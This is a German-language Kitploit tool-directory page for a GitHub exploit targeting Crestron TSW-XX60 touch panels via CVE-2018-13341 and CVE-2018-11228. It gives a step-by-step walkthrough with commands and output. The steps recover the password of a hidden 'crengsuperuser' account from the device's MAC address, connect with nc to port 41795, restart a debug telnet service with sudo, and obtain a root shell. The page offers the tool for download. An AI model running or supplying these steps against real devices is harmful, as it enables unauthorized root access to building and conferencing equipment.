Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-13341 — Dieses Tool zielt darauf ab, die CVE-2018-13341 auszunutzen. | Kitploit
Tools/GitHubGitHub/rajchowdhury240/cve-2018-13341
Embedded-System-SicherheitPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationHardware- & IoT-Sicherheit
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

Dieses Tool zielt darauf ab, die CVE-2018-13341 auszunutzen.

Repository anzeigen
vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-13341

Dieses Tool zielt darauf ab, die CVE-2018-13341 auszunutzen. Durch Verwendung der MAC-Adresse des Zielgeräts können Sie das Passwort des versteckten Kontos "crengsuperuser" wiederherstellen, das erhöhte Privilegien besitzt und die Ausführung von SUDO-Befehlen ermöglicht.

Das Crestron Toolbox Protocol (CTP) kann durch Zugriff auf Port 41795 auf dem TSW-XX60-Gerät verbunden werden.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

Anforderungen

Dieses Tool erfordert das CryptoGraphy-Modul.

root@kitploit:~
# pip3 install cryptography

ODER

root@kitploit:~
# pip3 install -r requirements.txt

Erste Schritte

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

Ausnutzen der CVE-2018-11228

Die CVE-2018-11228 ermöglicht unauthorisierte RCE über den Bash-Shell-Dienst im Crestron Terminal Protocol (CTP). Nachdem Sie das Passwort des versteckten Kontos "crengsuperuser" erhalten haben, können Sie Root-Zugriff auf das Gerät erhalten.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

Dann können Sie in einer neuen Shell Root-Zugriff auf die Box erhalten.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Credit Goes to : axcheron 
Tool herunterladen